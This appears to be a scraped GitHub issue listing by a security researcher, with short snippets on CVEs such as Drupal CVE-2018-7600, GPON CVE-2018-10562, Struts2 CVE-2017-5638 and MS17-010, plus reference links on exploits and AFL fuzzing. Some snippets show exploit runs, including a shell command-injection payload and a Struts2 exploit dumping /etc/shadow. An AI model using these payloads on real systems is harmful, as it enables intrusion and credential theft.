nixawk

Results 46 issues of nixawk

- https://www.python.org/dev/peps/pep-0008/
- https://google.github.io/styleguide/pyguide.html

## Description

Nginx versions from 0.5.6 up to and including 1.13.2 are vulnerable to an integer overflow in the nginx range filter module, resulting in a leak of potentially sensitive information triggered...

## Description

Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with...

CVE-2018-7600

```
$ py3 exploit-CVE-2018-10562.py http://192.168.1.100:8080/ "ls /"
INFO:__main__:sending payload: 127.0.0.1;`echo BGgw;ls /;echo BGgw`;
diag_result = "ping -c 4 -s 64 127.0.0.1;BGgw
bin boot bootimg dev etc home include initrd lib...
```

CVE-2018-10562

## References

- https://zerosum0x0.blogspot.jp/2017/04/doublepulsar-initial-smb-backdoor-ring.html
- https://zerosum0x0.blogspot.jp/2017/06/eternalblue-exploit-analysis-and-port.html
- https://risksense.com/_api/filesystem/468/EternalBlue_RiskSense-Exploit-Analysis-and-Port-to-Microsoft-Windows-10_v1_2.pdf
- https://www.exploit-db.com/docs/42329.pdf
- https://github.com/worawit/MS17-010
- https://www.exploit-db.com/exploits/42315/
- https://github.com/omri9741/cve-2017-7494/
- https://github.com/CoreSecurity/impacket
- https://github.com/CoreSecurity/impacket/blob/master/impacket/dcerpc/v5/epm.py
- https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb
- https://msdn.microsoft.com/en-us//library/cc738291(v=ws.10).aspx
- http://www.ampliasecurity.com/research/NTLMWeakNonce-bh2010-usa-ampliasecurity.pdf
- https://www.coresecurity.com/corelabs-research/publications/new-smb-and-dcerpc-features-impacket-v0960
- http://www.rubydoc.info/github/rapid7/metasploit-framework/Msf/Exploit/Remote/DCERPC...

MS17-010

## Command Injection

```
echo "xxx.xxx.xxx.xxxUSER-AGENT" | md5sum
```

- xxx.xxx.xxx.xxx is your IP.
- USER-AGENT can be a command injection @string. Send an HTTP request with a command injection...

CVE-2017-17411

Add https support

- https://github.com/nixawk/labs/blob/master/CVE-2017-5638/exploit-requests.py

```
$ python2.7 test.py https://192.168.1.100/ "cat /etc/shadow"
[+] The target is vulnerable.
[*] struts2-cmd $ cat /etc/shadow
[*] root:$6$nK....9iIdLoX3VzX.U.:17221:0:99999:7:::
bin:*:15513:0:99999:7:::
daemon:*:15513:0:99999:7:::
adm:*:15513:0:99999:7:::
lp:*:15513:0:99999:7:::
....
```

CVE-2017-5638

![exploit-000](https://user-images.githubusercontent.com/7352479/29016460-831bac08-7b20-11e7-94c7-b6628f7dca1c.png)

```
*** wait with pending attach

************* Symbol Path validation summary **************
Response                         Time (ms)     Location
Deferred                                       SRV*C:\Symbols*http://msdl.microsoft.com/download/symbols
Symbol search path is: SRV*C:\Symbols*http://msdl.microsoft.com/download/symbols
Executable search path is:
ModLoad: 2fe80000...
```

CVE-2015-2545

## AFL

- https://en.wikipedia.org/wiki/Fuzzing
- https://en.wikipedia.org/wiki/Fuzz_testing
- http://lcamtuf.coredump.cx/afl/
- http://lcamtuf.coredump.cx/afl/demo/
- http://lcamtuf.coredump.cx/afl/QuickStartGuide.txt
- http://lcamtuf.coredump.cx/afl/#bugs
- http://lcamtuf.coredump.cx/afl/README.txt
- http://lcamtuf.coredump.cx/afl/releases/afl-latest.tgz
- http://lcamtuf.coredump.cx/afl/technical_details.txt
- http://lcamtuf.blogspot.com/2014/08/binary-fuzzing-strategies-what-works.html
- http://lcamtuf.blogspot.com/2014/10/fuzzing-binaries-without-execve.html
- http://lcamtuf.blogspot.com/2014/11/pulling-jpegs-out-of-thin-air.html
- http://lcamtuf.blogspot.com/2014/11/afl-fuzz-crash-exploration-mode.html
- ...

fuzz